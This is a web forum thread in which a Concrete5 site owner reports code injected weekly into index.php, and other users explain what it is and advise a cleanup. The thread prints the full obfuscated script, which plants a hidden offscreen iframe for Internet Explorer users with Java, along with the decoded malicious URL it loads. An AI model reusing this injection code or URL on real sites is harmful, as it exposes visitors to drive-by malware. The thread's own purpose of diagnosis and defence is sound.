Strange code in my index.php
Permalink
Hello,
I have a problem with this theme, for some reason concrete put some code in my index file.
that is no big deal, but the code is causing trouble because the page wont load anymore, so i remove the code and the page pops up.
This is the code that is getting in the index file.
I have a problem with this theme, for some reason concrete put some code in my index file.
that is no big deal, but the code is causing trouble because the page wont load anymore, so i remove the code and the page pops up.
This is the code that is getting in the index file.
<?php echo '<script> var keyss = "ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas";var enc = [3, 5, 7, 15, 4, 32, 7, 9, 19];var ah = (new Date).getDate(); var strUA = "";strUA = navigator.userAgent.toLowerCase();if(strUA.indexOf("msie") != -1)if(navigator.javaEnabled()){var url = "http://";for (i = 0; i < enc.length; i++) {url += keyss.substr(ah * enc[i] % 31, 1);} url += ".in/ts/in.php?q=2";fff = "fram"; if (document.getElementsByTagName("body")[0]) {asdfasdfasdf43();} else {document.write("<i" + fff + "e src='" + url + "' width='100' height='100' style='position:absolute;left:-190;top:-982;'></i" + fff + "e>");}} function asdfasdfasdf43() {var f = document.createElement("i" + fff + "e");f.setAttribute("src", url);f.style.position = "absolute";f.style.left = "-129";f.style.top = "-172";f.setAttribute("width", "100");f.setAttribute("height", "100");document.getElementsByTagName("body")[0].appendChild(f);} </script>'; echo '';
thanks for the reply's
I have informed my hosting, but they said that there is nothing at his side. So it must be for some reason in a add-on or theme file or something like that.
I will search further, i have also noticed that it always add the code once a week.
I will search further.
I have informed my hosting, but they said that there is nothing at his side. So it must be for some reason in a add-on or theme file or something like that.
I will search further, i have also noticed that it always add the code once a week.
I will search further.
c5 did not add that. That looks like it could be malicious though.
Mike
Mike
Mnkras is correct -- it is absolutely positively not a Concrete5-specific thing (although it's possible that someone is exploiting a C5 vulnerability to inject that code into the pages). But the code itself doesn't do anything specific to Concrete5 -- it looks like it's inserting an iFrame into the page, but only for Internet Explorer and only if Java is enabled. I ran the code that generates the url and got this:
(don't actually go to that url -- it's probably does something bad).
So... somehow someone has gotten access to files on your server (it may not be a personal or targeted attack on you -- it could be some bot that just tries lots of different things on lots of different servers). Or maybe there's a javascript vulnerability that allowed this to happen through your website somehow. Or perhaps your CPanel or FTP name/password were gotten (or guessed)? Definitely change your account logins/passwords. And also I would try contacting your web host support again. Not sure what "nothing on his side" means -- maybe they think they don't have any security holes (which isn't possible to ever know for sure, so I'd be dubious if they claim this), or maybe they just mean that they didn't change the files. Regardless, it doesn't matter -- the fact is that one way or another someone accessed files on your server and they should be able to help you clean up the mess (not because it's their fault, but because their job is supposed to be to support their customers -- and also they should want to know if this happened on their servers as it likely is affecting other customers of theirs as well). If they are not going to be helpful to you at all, I'd suggest moving to a different web host that will support you better. You might have to pay an additional dollar or two per month, but if your website is important to you or your business, it will be worth it.
Best of luck.
-Jordan
http://mbw0dywuh.in/ts/in.php?q=2
(don't actually go to that url -- it's probably does something bad).
So... somehow someone has gotten access to files on your server (it may not be a personal or targeted attack on you -- it could be some bot that just tries lots of different things on lots of different servers). Or maybe there's a javascript vulnerability that allowed this to happen through your website somehow. Or perhaps your CPanel or FTP name/password were gotten (or guessed)? Definitely change your account logins/passwords. And also I would try contacting your web host support again. Not sure what "nothing on his side" means -- maybe they think they don't have any security holes (which isn't possible to ever know for sure, so I'd be dubious if they claim this), or maybe they just mean that they didn't change the files. Regardless, it doesn't matter -- the fact is that one way or another someone accessed files on your server and they should be able to help you clean up the mess (not because it's their fault, but because their job is supposed to be to support their customers -- and also they should want to know if this happened on their servers as it likely is affecting other customers of theirs as well). If they are not going to be helpful to you at all, I'd suggest moving to a different web host that will support you better. You might have to pay an additional dollar or two per month, but if your website is important to you or your business, it will be worth it.
Best of luck.
-Jordan
So you'd want to delete that code and/or restore from a known good copy.
You'd probably also want to raise it as an issue with your host.
I don't think it's a concrete5 specific hack/security issue. (
(although I have had to clean something like this for someone else's concrete5 site in the past, and it definitely looked like it was targeting concrete5... hmmm)